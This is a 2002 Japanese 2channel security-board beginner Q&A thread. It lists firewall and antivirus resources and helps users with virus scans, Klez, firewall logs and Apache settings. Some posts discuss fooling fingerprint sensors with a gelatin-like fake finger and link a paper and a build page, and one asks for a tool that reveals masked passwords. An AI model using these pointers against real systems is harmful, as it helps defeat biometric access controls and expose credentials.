くだらねぇ質問はここに書き込め　Ver2.17

くだらない質問は新規でスレを立てたり関係ないスレに書き込まずにこのスレに書いてください
掲示板の荒らし方や侵入の方法、メールボムの送り方等、攻撃方法の質問はご遠慮ください。
2ちゃんねるでは荒らし依頼は出来ません。また、この板ではアタック依頼は受け付けません。

関連リンク >>1-20
各種ファイアーウォール ログ解析ツール 日本語化パッチ
セキュリティチェックサイト whois 解説サイト 最新ウィルス情報
関連スレ･関連板、お約束、FAQ
ずれていたら>>1-40参照

(winなら)[Ctrl]キーと[F]キー(macなら)[コマンド]キーと[F]キーを同時に押すとページ内検索が出来ます
過去スレや関連スレの過去ログ等を調べてから質問してください

同じ質問を複数の板やスレッドに書き込むマルチポストは嫌われます。
答をもらえなくなるので、書き込んでしばしお待ちください。
お急ぎなら検索が早いかも？
http://www.google.com/intl/ja/

【各種 Firewall】
DoorStop Firewall (Mac用) http://www.opendoor.com/
ZoneAlarm http://www.zonelabs.com/
Tiny Personal Firewall (2.0.15Aはフリー、3.0はシェア) http://www.tinysoftware.com/
Kerio Personal Firewall http://www.kerio.com/
Agnitum Outpost http://www.agnitum.com/download/outpostfree.html
Sygate Personal Firewall http://www.sygate.com/
AtGuard http://download.lycos.com/swbasic/BasicResults.asp?query=atgd322
Look'N'StopLite http://www.looknstop.com/En/index2.htm
BlackICE Defender http://www.toyo.co.jp/security/
Snort for Win32 http://www.datanerds.net/~mike/snort.html
Intact Open Use http://pedestalsoftware.com.cnchost.com/intact/compare.htm

【ログ解析ツール】
ICEWatch http://keir.net/icewatch.html
ZoneLog Analyser http://zonelog.co.uk/
TPF Log Analyzer (Tiny Personal Firewall用) http://server47.hypermart.net/tinyfirewall/

【スパイソフト発見ソフト】
Ad-aware http://www.lavasoft.de/downloads.html

【日本語パッチ等】
ZoneAlarm 日本語化パッチ その１ http://etcd.virtualave.net/
ZoneAlarm 日本語化パッチ その２ http://www.ryulife.com/net/security/index.html
Tiny Personal Firewall 日本語化パッチ (2.0.15Aまで) http://www.geocities.co.jp/SiliconValley-Cupertino/2943/
Kerio Personal Firewall 日本語化パッチ http://page.freett.com/nanasisan242/
Agnitum Outpost(日本語で使用可能)
ZoneAlarm Pro体験版 http://www.zonelabs.com/zap_download_trial_4.htm

【セキュリティチェックサイト】
Shields UP! https://grc.com/x/ne.dll?bh0bkyd2
Shields UP!の日本語解説サイト http://www.upsizing.co.jp/news/report0426.html
Symantec Security Check http://security2.norton.com/common/1033/sym/sym_intro.asp
Secure Design - Port Scan Security Check http://www.sdesign.com/securitytest/
セキュリティサイトのリンク集 http://www.toyo.co.jp/security/ice/advice/Support/KB/q000026/default.htm

【Whois】
APNIC http://www.apnic.net/
JPNIC Whois Gateway http://whois.nic.ad.jp/cgi-bin/whois_gw
IPドメインSEARCH MSE株式会社 http://www.mse.co.jp/ip_domain/index.shtml

【解説サイト】
Firewall 解説サイト Fire & Forest http://eazyfox.tripod.co.jp/
Snort 解説サイト http://www.port139.co.jp/ntsec_snort.htm

【ウィルス情報】
IPAセキュリティセンター http://www.ipa.go.jp/security/isg/virus.html
Symantec Security Response http://www.symantec.com/region/jp/sarcj/
Trend Micro ウィルス情報 http://www.trendmicro.co.jp/virusinfo/index.asp
McAfee ウィルス情報 http://www.nai.com/japan/virusinfo/vinfo.asp

【過去スレ･関連スレッド･関連板】
【過去スレ】
ver2.12 http://pc.2ch.net/sec/kako/1002/10021/1002134745.html
ver2.13 (html待ち) http://pc.2ch.net/test/read.cgi/sec/1009795619/
ver2.14 (html待ち) http://pc.2ch.net/test/read.cgi/sec/1014116411/
ver2.15 (html待ち) http://pc.2ch.net/test/read.cgi/sec/1017903445/
ver2.16 http://pc.2ch.net/test/read.cgi/sec/1021270127/

【無料FW】
ZoneAlarm Part6
http://pc.2ch.net/test/read.cgi/sec/1020416762/
Tiny Personal Firewall Part4
http://pc.2ch.net/test/read.cgi/sec/1015535895/
Kerio Personal Firewall Rule3 (248)　
http://pc.2ch.net/test/read.cgi/sec/1022081681/
Agnitum Outpost
http://pc.2ch.net/test/read.cgi/sec/997301454/
SygatePersonalFireWall
http://pc.2ch.net/test/read.cgi/sec/993936202/
＿■■■BlackICEスレ 2■■■＿
http://pc.2ch.net/test/read.cgi/sec/1012458984/

【無料AV】
無料AntiVirus【AntiVirPE/AVG/Antidote簡易版】
http://pc.2ch.net/test/read.cgi/sec/1015584020/
H+BEDV Antivir Personal Edition Part2
http://pc.2ch.net/test/read.cgi/sec/1016561367/
【フリー】AVG Anti-Virus　Version2
http://pc.2ch.net/test/read.cgi/sec/1018966825/
アンチドートを語ろう♪
http://pc.2ch.net/test/read.cgi/sec/1003987914/

【有料FW&AV】
Win XPのファイアーウォール
http://pc.2ch.net/test/read.cgi/sec/1001149463/
【ノートン】インターネットセキュリティ2002 Ver.9
http://pc.2ch.net/test/read.cgi/sec/1023828379/
ウイルスバスター２００２ Part４
http://pc.2ch.net/test/read.cgi/sec/1021091165/
がんばれマカフィー
http://pc.2ch.net/test/read.cgi/sec/1020474494/
｜･)ﾉｺｿｰﾘとマカフィー＠難民板
http://ex.2ch.net/test/read.cgi/nanmin/1016347609/

【その他】
初心者用質問スレッドはじきに代替わりしそうなので
ここに記載しません。探してください。
☆ウィルス情報＆質問　総合スレッド☆part4
http://pc.2ch.net/test/read.cgi/sec/1024061532/
最強のウィルス対策用ソフト
http://pc.2ch.net/test/read.cgi/sec/1000957607/
ファイアーウォールソフト 総合スレッド Part3
http://pc.2ch.net/test/read.cgi/sec/1016238340/
最強のファイアーウォールソフトって何かな？
http://pc.2ch.net/test/read.cgi/sec/988724444/
スパイウェア発見専用ソフト｢Ad-aware｣　part2
http://pc.2ch.net/test/read.cgi/sec/1020360932/
●セキュ板 雑談スレッド●[４]
http://pc.2ch.net/test/read.cgi/sec/1013427349/
OE(又はIEｺﾝﾎﾟｰﾈﾝﾄ使用ﾒｰﾗｰ)の問題点とその対策方法
http://pc.2ch.net/test/read.cgi/sec/1021363841/
ＩＥ５・５と６・０、ネット閲覧ソフトに欠陥
http://pc.2ch.net/test/read.cgi/sec/1005605775/
Klez.E、Klez系スレッド part3
http://pc.2ch.net/test/read.cgi/sec/1024255721/
HDぜんぶ消去した上ズタズタに！！ウィルス ２台目
http://pc.2ch.net/test/read.cgi/sec/1012296560/

パソコン初心者＠2ch掲示板 http://pc.2ch.net/pcqa/
初級ネットワーク＠2ch掲示板 http://pc.2ch.net/hack/
windows＠2ch掲示板 http://pc.2ch.net/win/
ソフトウェア http://pc.2ch.net/software/
ダウンロードソフト(download板) http://tmp.2ch.net/download/
パソコン一般＠2ch掲示板 http://pc.2ch.net/pc/

【お約束】
○ウィルスやブラクラのリンクを張るときは･･･
　他の方が誤ってクリックしても問題ないよう、直リンは避けてください。
○アダルトサイトに行くときは・・・
　インターネットオプション→セキュリティ→インターネット→レベルのカスタマイズ
　→ActiveX、JAVA、スクリプトを全て無効にしてください。
○怪しいリンクを踏むときは･･･
　view-source://URLでソースを表示して判断してください。Javaスクリプトなどは実行されません。
○リンク先を直接見るときは・・・
　「対象をファイルに保存」して一旦ファイルにし、メモ帳で一度開いてください。
○メールチェックをしたら、怪しいメールが届いていました・・・
　開かずに捨ててください。捨てようとしてクリックした時に感染する恐れがありますので、
　OEのプレビュー機能を必ずオフにしてから削除してください。
○IE4.0、IE5.0、IE5.5を使用しています・・・
　IE4.0は今後不具合が発見されてもフォローされません。IE5.5SP2かIE6.0に乗り換えてください。
　IE5.0、5.5の方はSP2にアップデートの後、各種パッチを当ててください。
○ウィルス対策ソフトを入れていますが･･･
　パターンファイル(ウィルス定義ファイル)を更新していなければ意味がありません。
　感染する前に定期的にチェックしましょう。

【FAQ他】
　【IE&OE】
○OEのプレビューをオフにするには・・・
　OEのメニューバーにある「表示」→「レイアウト」→「プレビューウィンドウを表示する」のチェックを外してください。
○メーラーにOEを使っていませんのでウィルスメールを開いても、自動的に実行したりしませんよね･･･
　メーラーがOEでなくても、IEコンポーネントを利用してHTMLメールを表示する場合は、
　IE、OEの不具合を引き継ぐことになります。ですので、自動的に実行しないとは言い切れません。
○アダルトサイト閲覧中に突然ファイルをDLして、デスクトップにアイコンが出来てしまいました・・・
　アイコンのプロパティからリンク先を表示で出てきたファイルをアイコンとともに削除してください。
　MS-DOSプロンプトを起動して、msconfigで見慣れないものを削除してください。
　C:\windows\Downloaded Program Files\にあるファイルを削除してください。
　MS-DOSプロンプトを起動して、scanreg /restoreも効果的です。
○いつの間にかIEのスタートページと検索のページが書き換えられていました・・・
　ウィルス対策ソフトを試してみて、Trojan.JS.Offensiveならインターネットオプションから再設定してください。

　【IPアドレス】
○IPアドレスを見るにはどうすれば･･･
　自分のIPアドレスを見るにはMS-DOSプロンプトを起動して、winipcfg(9x系)かipconfig /all(NT系)を実行してください。
　他人のIPアドレスを見るにはMS-DOSプロンプトを起動して、netstat -an
を実行してポートから判断してください。
○IPアドレスから個人情報が抜かれたり･･･
　プロバイダがもっている情報は公権力が無い限り、外部に公開することは無いと信じてください。
　それよりも、コンピューター上のファイルなどから判断することの方が容易かもしれません。
○IPアドレスから利用しているプロバイダを知りたいのですが･･･
　>>2-5の【Whois】を利用してください。
　【掲示板】
○掲示板が荒らされて困っています･･･
　注意、警告、放置、削除、一時閉鎖、利用制限、通告、完全閉鎖
　冷静に判断、選択し、対応してください。困っているのは貴方だけではありません。
○掲示板の利用者のIPアドレスは抜けますか･･･
　HTMLソースに書いてあることもありますが、無いこともあります。
○PCから携帯電話専用のページを見たい
　UA（ユーザーエージェント、ブラウザなど）で判定しているページなら偽装で可能。
　ただし、それで見られるページというのはあんまり…

くだらない内容の単発質問スレを立てて、
煽られ罵られながらもこのスレへ誘導された方へ
下記にて単発質問スレの削除依頼をしてから、
質問を書き込んでください。

▽セキュリティ板スレッド削除依頼▽
http://kaba.2ch.net/test/read.cgi/saku/991559247/
こちらへ「必ず "age" で」該当するスレのタイトルとリンク、
削除の理由を添えて削除依頼を出してきてください。
削除されたら「必ず "sage" で」御礼をしてきてください。

<<よくある質問>>
　Q.最大化、最小化ボタンが数字に！
　A.http://homepage2.nifty.com/winfaq/fontstrouble.html

　Q.JPEG などのプレビューができなくなりました
　A.http://homepage2.nifty.com/winfaq/trouble_110.html

　Q.IE5.5 で、ページが表示されなかったりページ違反が起きます
　A.http://homepage2.nifty.com/winfaq/c/ietrouble.html#377

　Q.Windows 2000 に接続すると IPC$ のパスワードを聞かれます
　A.http://homepage2.nifty.com/winfaq/c/network.html#827

　Q.Outlook Express でリンクを開くと C ドライブが表示されます
　A.http://homepage2.nifty.com/winfaq/c/oetrouble.html#15

　Q.Outlook Express 5 のメールパスワードが保存されません
　A.http://homepage2.nifty.com/winfaq/c/oetrouble.html#982

　Q.アクセサリなどがアンインストールできません
　A.http://homepage2.nifty.com/winfaq/w2k/setup.html#850

前スレで、フォントキャッシュ破損の質問が何回かあったので
Win板のFAQももってきてみますた。

普通にネットとかしてて２日くらいで急にファイル数？？が５０００位
増えることありますか？？
特に何かをダウンしたわけでもないですが・・・。
一応はウイルスチェックは入れたんですが反応無くて・・・。
ノートンさんが優秀？みたいなのでダウン中ですがやっぱ怖くて・・・。
皆さん教えてください。

ソースネクストでウイルススキャンをダウンロード（分割で）しました。
マニュアル通り、ファイルをダブルクリックするが、展開しません。

で、｢どのアプリケーションで開きますか？｣と聞いてきます。
メールで問い合わせるが、１月以上返事も来ない。
電話しても常に話中でどうにもなりません。
御教授ください。
困っています。

>>11
なんで古いスレにマルチしてんの？間違いなら間違いでしたくらい書け
詫びの文もなしに新スレで同じ質問しゃあしゃあ書ける神経がわからん
>>12
Wクリックしたファイルの名前と拡張子くらい書け
つか100%それがexeじゃないだけだろ。

すいません・・・。
書いてきます。

>>12
糞ー巣ネクストとは関らないこれ鉄則。金払ってないなら他のにしる。
この板ではマカも評判悪いので、苦労したくなかったら、金払ってても他のにしる。

んで>>11=14の環境は？OSさえわからないんじゃ調べようがない
あと急に増えたファイルの拡張子。ウィルスじゃないなら
tmpファイルか？tmpは基本的には消しても平気だと思うが
ちなみにウィルス定義は最新だろうね？

いちおう、Temporary Internet filesが増えた！ってのはナシだぞ。
念のため

なんで前スレより下がってるのかと小一時間age

最近（４，５日前）このスレの前すれ（９０８）で画像にウイルスがと言う内容で書いたんですが・・・。
ＯＳはＸｐです。
何が増えたのかははっきり言ってわかりません・・・。
と言うか更新ファイル？を見たけどよくわからなくて。
普通にネットしてて５０００も増えたこと無かったので異常かなと？？

>>19
インターネットキャッシュ消して、いくつファイル数減るか見たら？
IEだったらインターネットオプション→一時ファイルの削除
一度見たページの表示が若干遅くなるけど、たいした弊害じゃなし、
むしろIEなどで表示がおかしくなるのを回避できることが多いし。

>>19
んじゃなんでファイルが増えたってのに気付いたんだ？
どこに増えた？c:\windows\下か？

最近ウイルスチェックして〈２，３日前）（６５０００位）今日マウスの動きが変（上下にスクロールさせたら文字の大きさが変わる？？）
みたいな感じで、？？って思ってウイルスチェックしたら（７００００位に）増えてました。
何とか／何とかってファイル数でしたよね？？
それともそこが私の勘違いですか？？
しょうも無いこと聞いてすいません。

もう少し分かり易い文章書く努力してくれ・・・
それでその問題は
１、>>19の通りIEのキャッシュが増えただけ
　　削除法はIEのツールバーのツール→インターネットオプション→
　　インターネット一時ファイル→ファイルの削除
２、そもそもそれファイル数じゃなくて既知のウィルスの定義の数じゃないの？
３、その他、意図しないところでファイルが増えている

１の通りキャッシュクリアして、ファイル数が大体戻ったら１。
キャッシュクリアしてもウィルススキャンの表示されてる数がかわらなかったら２。
数は減ったがそれでも全然多いなら３。

今ノートンさん作動中なんですが、３だとやばいですか？？
原因は調べるには？？

>>19の通りじゃなくて>>20だ

>>24
つうかあんたキャッシュは消したの？
原因を調べる（絞る）方法が>>23なんだが？

＞＞２３
すいません・・・。
何がどう悪いかもわからず・・・。
ただ、普段と？変わらずつないでいただけなのに急に増えて・・・。

>>27
とりあえずキャッシュ消せよ！

>>27
だから何処にどのように表示される数字が増えたんだと聞いているんだ。
それがわからなきゃ答えようが無い。解決したかったら俺達にどの数字か伝える努力をしろ。

キャッシュは消しました。
数字とはウイルスチェックする際の数（全数）が
１ヶ月くらいは６５０００だったのです。
それなのに今朝不具合が出てたからチェックしたら７００００を越してたのです。
わかりにくいとは思いますがこれでいいでしょうか？？

だから漏れは>>23で書いた通り>>23の１、の手順でキャッシュを消し
ノートンで再度チェックをかけ、その数値がどうなるかで3通りに絞れるから
それを報告しろって言ったんだが、通じてないのか・・？

>>30
消したなら今もう一度ノートンでスキャンかけてその数値がどうなったか報告
すれって。パソコン初心者でも言ってることは理解できるだろ？

ノートンさんは相変わらず稼動中です。
現在４９０００位です・・・。
申し訳ありませんがしばらくお待ち下さい。

日本語が通じないやつ相手に大変だねぇ

>>30
これで定義済ウィルス数でないことは判明した。次は>>31をやって報告せよ。

サポセンって偉いよなぁ。

もう寝るわ

寝るのか世ｗ

遅くなりました。

ウイルスは無いみたいなんですが、やっぱり７００００です。

キャッシュ消して数が全く変わらないって事はないだろ・・・
ノートンのその、スキャン後の画面キャプチャしてどっかにupしてくれると
わかりやすいんだが、できんか？
それとtempフォルダってデフォでどこだっけ？
c:\windows\Temporary Internet files\だっけか？そのフォルダも開いた状態で
キャプきぼーん。そのフォルダにファイル残ってたら漏れはこのウィンドウ閉じるがｗ

ていうか今度は９００００を超えました。
何ででしょうか？？
ウイルスバスターとノートンさんの調べるファイル数違うんですか？？
チェック終ったと思ったのにまだ続いてる・・・。
ウイルスバスター（体験版）はアンインストールしたから減ると思ったのに何故？？

バスターとノートンではファイル数の数え方が違うので、単純比較はできない。

最終的に１０万超えてました・・・。
マスターブートレコード、ブートレコードってのは各１で後は０でした。
何が原因でしょうか？？

ネタ臭くなってきたので、その画面をキャプれ。
PrintScreenキー押してペイントで貼り付けて保存して、画像を
http://sakots.pekori.jp/imgboard/imgboard.cgi
にでも貼り付けれ。んじゃなきゃラチあかん

１度閉じたスキャン結果はどうやって調べたら？？

もっかい調べなおしてくれ

>>44
NortonAntiVirus2002なら
「レポート」のところを開いて「活動ログ」の「レポートを表示」を
クリックしてみてくれ！

IEをアップデートし終わってからスパイウェアをチェックしたら
Alexaというのが発見されました　レジストリをいじられている様なんですが
大丈夫でしょうか？

クリックしました。
コピーできないんですが、何か方法ありますか？？
ていうか右クリックききません！！

メッセンジャーのセキュリティ性をアップさせるにはどうすればいいのですか？

>>47
http://www.google.com/search?q=Alexa+%83X%83p%83C%83E%83F%83A&hl=ja&btnG=Google+%8C%9F%8D%F5&lr=
>>48
おのれは>>43の日本語が読めんのか。
なんで初心者ってちゃんと手順を示しても二重三重に聞いてくるんだ？
>>49
セキュリティ気にするくらいなら使うな

>>50
ありがとうございました
まさかアップグレードでも入るとは思いませんでした
本当に助かりました

何回しても出来ません・・・。
何か設定がおかしいのでしょうか？？
一応もっかいスキャンしてます。

>>52
何ができないんじゃー！？
１回でわかるように書けーっ！

前スレの974ですが結局メッセンジャーを使う上でセキュリティを高める方法は
ないってことですか？

>>54
知らない人とは話さない。お菓子をくれるといっても駄目。

>>54
最新バージョンとパッチ追っかける

>>55
レスしてんじゃん

あかんわ。。。無駄に疲れた。。。もうだめだ
最後にこれだけ・・・キャプチャーのやりかた
１、スキャン終了した画面でキーボードの左上のほうにあるPrintScreen
（もしくはCopy)ボタンを押す
２、ペイント起動
３、ツールバーの編集→貼り付け
４、その画像保存してupload
以上・・・てかなんでこんなことを何度も何度も説明せなわからんのか・・・
ほんとサポの人尊敬するわ。Win板のサポスレに紹介しとこ・・・
てことで>>53あとはよろすく

大変ですな・・・

出来たので画像上げようとしてもさっきの所にあがりません・・・。
俺のところの環境が悪いのでしょうか？？

>>59
もうややこしそうだし、変なことになってもいかんので、
画像アップロードの話は忘れてくれ。
画像が見られるなら手間かもしれんが書き写してくれ。

で、インターネット一時ファイルの削除はできたんだな？
念のためにもう１回やってみてくれ。
でウイルスチェックをする。でレポートを書き写す。
それから、インターネットでお気に入りのところを一回りするとかして
ウイルスチェック→レポートを書き写す。
大体それぐらいはファイル数が増えるってことだ。
ちょっとやってみそ。

正確に書き出す能力が無い（つか本人もファイルの数ですよね？とか言ってるし）
から画像うｐすれって言ってるんだと思うけど・・・
あまりにも、1を聞くのに10を教えなきゃいけない状態だし
こっちが言ったこと1回の書き込みにつき2割程度しか理解&実行してないし
まあ60さんが考えがあって、教えられるなら口出し無用だと思うけど。

>>61
>60だけど。
画像うぷすれの件は大体見ていたので分かっているつもりだけど
なんかドツボにはまってどうにもならなくなりそうなんで。
多分ちょっとしたことで失敗しているんではないかと思うけど。
で、とりあえず見られるところからやっていったらどうかと。

>>59、その他
それから「素人」さんよ、マウスがおかしい、の件。
スクロールさせて文字の大きさが変わったと書いているが、
Ctrlキーを押しながらスクロールボタン（ホイール）を動かすと
大きさが変わるのが普通だよ。
問題があるのは、マウスじゃなくキーボードでは？
ShiftやCtrlがひっかかっていると、起動でおかしくなったり、
クリックのつもりがドラッグになったり変なことになるよ、よく。

アパッチの設定で、DirectoryIndex という項目がありますが、
DirectoryIndex index.html
こういう風にすると、
http://myserver/docs/　これが　→http://myserver/docs/index.html
こんな風に表示してくれますよね？ただ、同時にindex.htmｌを置いてない場合
ディレクトリ構造が丸見えになってしまいます。
index.htmlに飛ばしつつ、index.htmlがなければ、
ディレクトリの中身を表示しない。ということは可能でしょうか？

>>64
DirectoryIndexはファイル名を指定しない時の検索順で、
「こんな風に表示させる」ためのものではないからな。
confなのかhtaccessなのか知らんが、Indexesをキーワードで
調べろ。
ついでに、板違いだ。

今突然ハードディスク入れる所が開いたんですけどなんなんですかねー？

>>66
ネジがはずれたのだろう

>>59などの「素人です」の人へ
正体不明の不可解なファイルが多数作成される場合を
あげておくので、調べてみてくれ。
２ちゃんで下記のURLをクリックすると#以下が落ちてしまうので、
範囲指定してコピー→アドレス欄にペースト推奨。
分からなかったら表題でそのページ内を探してくれ。

http://homepage2.nifty.com/winfaq/wme/trouble.html#294
起動ごとに Windows フォルダに 0 バイトの一時ファイルが作成されます
http://homepage2.nifty.com/winfaq/c/trouble.html#14
FILExxxx.chk というファイルがたくさんあるのですが？

>>66
珍しいな、CDの蓋が開いたとか演奏し始めたとかｈ結構あるのに。

WINDOWS98です。
ファイルに拡張子はついてないです。
全６ファイルで、ファイル名は以下のとおり

CAKXSPVW(プロパティないの正式ファイル名をみるとSELF JOIN EXE）
CAWDMJOL
CAVRPBXN
CAIRODUV
CAQOGHFU

キャンセルしたくても電話は不通。

>素人ですさん

エクスプローラー　→　検索

で、今日付けで作成されたファイルを検索して
どんなファイルが増えているのか（ファイル名・拡張子・場所）
まずは確認

>>70
> ファイルに拡張子はついてないです。
フォルダオプションの表示で、拡張子を表示させるようにしてる？
デフォルトのままだと、表示されない場合もあるが。
それに「プロパティない（内？）の正式ファイル名」って。。。
もしかして、ショートカットなのかな？
ソースネクストで説明とQ&Aを見てきたけど、
VSOなんとか.exeっていうファイルができるみたいになっていたが。

お忙しい所すみません。
ファイルはデスクトップにダウンロードするよう支持があり、
ショートカットです。
今その６個のショートカットを１つのファイルに入れ、
フォルダオプションで、拡張子を表示するようチッックしましたが、
変化なしでした。

>>73
いや、ショートカットは拡張子関係ないんで。
一応元のところに戻してプロパティからどのファイルに
つながるショートカットか見て、
エクスプローラの検索などから、そのファイルがあるかどうか見て
みれば？ないようだったら再ダウンロード。

本音をいうと>>15に賛成だけどな。

ＩＤを隠したのに
>>1＝>>10は○○とバレました。
文体も全然違うのになんでバレたんでしょう？
ＩＥだけで見てるヤシだけじゃないんだよとつっこまれました。
ＩＤを隠してもバレるブラウザってあるんですか？
あったら教えてください。

>>75

さぁ〜

ttp://homepage2.nifty.com/Mafty/html/biyon.html
昨日これ踏んでからPCの調子がおかしくなりました。
一時ファイルの設定が変えられたりしていたので、システムの復元をしたら直ったのですが・・・
これは単なるブラクラですか？詳しい方がいたら教えてください。
ちなみにスキャンしたところウィルスには感染していませんでした。

>>75
ない。
気にするな。

>>77
ホームページビルダーで作られたページ。
特に怪しいソースなし。

ここって Proxomitron の質問してｲｲかなと思いつつ質問
これで串ってどうやって使用すればいいんでしょうか
外部プロクシのリストはいれたんですが…
串のIPになりません
どうしてじゃろ

どうやったら串使えるかという説明キボン

パスワード（*******など）をどっかにドラッグしてそのパスワードが見れるツールありませんでしたっけ？
あったら教えてください。

>>82
こっち行けば？
http://pc.2ch.net/software/

>>82
たしか、そんなのあったな

どなたか教えてください。
OSのリカバリー後にNorton Internet Security2001を
インストールし直したのですが、NISライブアップデート（定義更新）
をしようとしたところ
「Windows Explorerがインターネットに接続しようとしています」
という警告が出ます。IEではなくExplorerです。
こんなことってあるのでしょうか？
当方Windows Me・IE5.50
マイドキュメントとメールデータはDドライブに保存、ウィルス感染歴なし

初心者です。どなたか知恵をお貸し下さい。ＯＥを使用しております。
this is new gameというメールが来たので開くと日本語の受信メール等が文字化け
し、英語のメールなどは内容が消えてしまいました。復旧する方法もしくは
対応するスレを教えていただけませんか？

>>86
どうぞ。
http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.removal.tool.html

皆様のお知恵を貸してください！
以前、テレビである大学の教授によって
「指紋センサー」が、いとも簡単にやぶられていました。
材料は公開されませんでしたが、
ホームセンター等で簡単に手に入るそうです。
材料名とかはネット上ですので公開してほしくはありませんが、
なぜ、やぶられたのかを知りたいのです。
誰かご存知の方、教えてください。

>>86
KLEZって、んな症状でたかなぁ。。。はて。
文字化けはOutlook Express開いて、表示→エンコード、でしょうか。

>>88
あろんあるふぁ？

＞８８さんへ
私も、以前、テレビ番組で見ました。
何か、簡単な材料で指紋センサーを騙してましたね（笑
俺も興味があるので、とりあえずage

>>85
Explorerの接続は遮断。
そしてhttp://winfaq.jpに行って、｢ノートンを入れたらフォルダが開くのですが｣という項目を参考にして対処。

>>88,>>91 これだろ。
http://www.ipsj.or.jp/members/SIGNotes/Jpn/27/2000/010/article023.html

>88
おいらも見た。なにか、ゼラチン質のような
プルプルとした無色透明なモノを作って
それで他人の指紋の型をとって、自分の指に付けたら
簡単にクリアしてた(￣▽￣：
あんなのでイイのかな？

９３の人。ありがとう！
さすが、２ちゃん！
情報の宝庫ですな。
またよろしゅうお願いします。

毎回違う英語の題名で内容も全て英語で添付ファイルの付いたメールが毎日送られてきます。（ウィルス対策は済んでます。）
開いても英文が2行あるだけで何も起こりません。
以前はパソコンに来てましたが、最近は携帯メールにだけ送られてきます。
これって何ですか？やっぱりウィルスですか？

作ってみる?
http://www.mackport.co.jp/WEEKLY-BIO/bio033/bio033.htm

８７の方レスありがとうございました。何とか復旧できました。

>>92
情報ありがとうございます！

セキュリティとして、まず不要なポートを塞ぎたいです。
要・不要のポートを教えて下さい。

ノートン先生（PFW)がこのように検知しました。（ｲﾍﾞﾝﾄﾀｸﾞの接続にて）

・日付: 2002/06/25 時刻: 23:17:56
　接続: （略）.ne.jp: smtp に oemcomputer: 1040,
　55 ﾊﾞｲﾄを送信,　132 ﾊﾞｲﾄを受信,　1:01.125 経過

いつもの接続は、「〜に」という部分の「：」以下が固定されているのに、
今回は「smtp」に変わっていました。
（これが初めてなようで、この11分後にもまたこれになって接続されていました。）
しかも、自分は数分しかPCを繋いでいないのに、
やたらと接続時間が長いんですけど、これって外部からのｱｸｾｽがあった
ということになるんでしょうか？（どういうことなんでしょうか？）
ちなみに、11分後のについては、以下になります。

・日付: 2002/06/25 時刻: 23:28:34
　接続: （略）.ne.jp: smtp に oemcomputer: 1044,
　2489 ﾊﾞｲﾄを送信, 215 ﾊﾞｲﾄを受信,　2.819 経過

なお、FWにては、これらの時間に一番近い時間で、2回ｱﾀｯｸがありました。
関係があるのでしょうか？

�@・日付: 2002/06/25 時刻: 23:30:20
　　未使用ﾎﾟｰﾄﾌﾞﾛｯｸ機能が通信をﾌﾞﾛｯｸしました｡ 詳細:
　　ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
　　ﾘﾓｰﾄｱﾄﾞﾚｽ､ ﾛｰｶﾙｻｰﾋﾞｽは 61.141.120.83,http

�A・日付: 2002/06/25 時刻: 23:30:22
　　未使用ﾎﾟｰﾄﾌﾞﾛｯｸ機能が通信をﾌﾞﾛｯｸしました｡ 詳細:
　　ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
　　ﾘﾓｰﾄｱﾄﾞﾚｽ､ ﾛｰｶﾙｻｰﾋﾞｽは 61.141.120.83,http

101の一部
「いつもの接続は、「〜に」という部分の「：」以下が固定されているのに、
今回は「smtp」に変わっていました。」ですが、
変わっていた理由らしきものが分かりました。
あとの件はまだ分からずなので、
もし分かる方がいらしたらご回答をよろしくお願いいたします。

>>100
Kerioの説明のホームページあるからそこを参考にしてみては？
閉めた方がいいポートとか、アプリが使用するポートが色々載ってる
ttp://www.geocities.co.jp/SiliconValley-PaloAlto/9424/tpf/tpf_rule_main.html
↑一応参考までに、後はログとって必要なとこあけたりしめたり、色々と

acrobat形式のファイルにセキュリティロックがかかっていて、
印刷、コピー等ができません。
どうやったらセキュリティ解除できますか？
もしくは、どうやったら印刷できるようになりますか？
教えてください。

printscreenは？

>>101-102
ノートンが入っているから、トロイとかウイルスなどが外部接続してる可能性は低い。
変なアプリケーションが起動してなければ、気にする必要はないと思う。
未使用ポートについては、２ちゃんの串チェックみたい。

>>101-102
あ、また同じ事が続くようならまたここに質問してほしい。

>>96
最近はウイルスでもspamメール（大量広告メール）でもいろんなものがあるし、
携帯電話だと形式が不整合で添付ファイルが落とされたりもするし、
それだけの情報では何ともいえない。
とりあえず、OSやIEなどのアップデートしっかりして、アンチウイルスの定義を
ちゃんと更新しておけば、あんまり気にしなくてもいいと思うが。

>>104
ご了承ください。
http://www.so-net.ne.jp/e-novels/goannai/whats-pdf.html

>>101-102
>変わっていた理由らしきものが分かりました。
解決したかったらわかってることは全部書け。こっちは神じゃないんだ。
SMTPはメル送信のときに使うポート。お前のパソ(oemcomputer)からメルが送信されたという事だ。

>>106-107
>>109
詳しいご説明、ほんとにありがとうございました。
また何かあったら、ﾌｫﾛｰよろしくお願いいたします。
それから109さん、「変わっていた理由らしきもの」というのは、
おっしゃるとおり、ﾒｰﾙ送信の時にそれが表示されていた、
ということでした。言葉が足らずですみませんでした。

たびたびすみません。
>>106
＞未使用ポートについては、２ちゃんの串チェックみたい
とのことですが、この点について質問です。
2ちゃんに接続してない時にもｱﾀｯｸがあるんですが、どういうことでしょうか？
（2ちゃんに接続の時はどうかは今のところ未確認ですが・・・）。
例えば、このように連続してありました。
（httpからの場合、1回につき、いつも2〜3秒間隔で連続あります。）

・日付: 2002/06/26 時刻: 16:46:58
　未使用ﾎﾟｰﾄﾌﾞﾛｯｸ機能が通信をﾌﾞﾛｯｸしました｡ 詳細:
　ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
　ﾘﾓｰﾄｱﾄﾞﾚｽ､ ﾛｰｶﾙｻｰﾋﾞｽは 61.126.205.77,http

・日付: 2002/06/26 時刻: 16:47:01
　未使用ﾎﾟｰﾄﾌﾞﾛｯｸ機能が通信をﾌﾞﾛｯｸしました｡ 詳細:
　ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
　ﾘﾓｰﾄｱﾄﾞﾚｽ､ ﾛｰｶﾙｻｰﾋﾞｽは 61.126.205.77,http

ちなみに、見ていたｻｲﾄは、ごく一般のｻｲﾄです。
それから、使用しているのはWindows Me、ﾏｲｸﾛｿﾌﾄIE(ver.6.0)で、
ｲﾝﾀｰﾈｯﾄｵﾌﾟｼｮﾝの設定の詳細設定では、
「HTTP 1.1設定」のところで、「HTTP 1.1を使用する」にしています。
「串接続で使用する」にはしていません。
なお、接続方法は、ﾀﾞｲｱﾙｱｯﾌﾟです。

ブロックしてんならどうでもいいだろ

